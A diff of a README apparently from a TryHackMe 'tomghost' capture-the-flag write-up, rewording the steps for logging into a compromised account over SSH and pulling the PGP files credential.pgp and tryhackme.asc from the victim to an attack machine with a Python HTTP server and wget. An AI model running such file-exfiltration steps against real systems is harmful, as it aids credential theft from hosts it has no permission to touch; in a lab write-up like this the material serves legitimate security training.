AnnaKu32/thm-rooms/tomghost/README.md

 <span style="line-height:0.5;">&nbsp;</span>

 ### Log in to the skyfuck account
-SSH to skyfuck account.
+Use SSH:
 ```BASH
 ssh skyfuck@10.10.149.201
 ```
 ![image](https://github.com/user-attachments/assets/b3d3f0ca-4b05-4925-bd46-1ca9a8458e55)

-In skyfuck account there are two weird files: `credential.pgp` and `tryhackme.asc` These are PGP encrypted files, which likely contain the user flag.
+Inside the account, there are two suspicious files: `credential.pgp` and `tryhackme.asc`.
+These are likely PGP-encrypted and may contain the flag or credentials.

 ![image](https://github.com/user-attachments/assets/d6526c3c-a1d9-4e02-bd78-0801d744d2e3)

-Run python http server on vicitim machine.
+<span style="line-height:0.5;">&nbsp;</span>

+### Download encrypted files to your attack machine
+Start a Python HTTP server on the victim machine:
 ```BASH
 python3 -m http.server 8000
 ```

-Download files on attack machine.
+On your attack box:
 ```BASH
 wget http://10.10.149.201:8000/credential.pgp
 wget http://10.10.149.201:8000/tryhackme.asc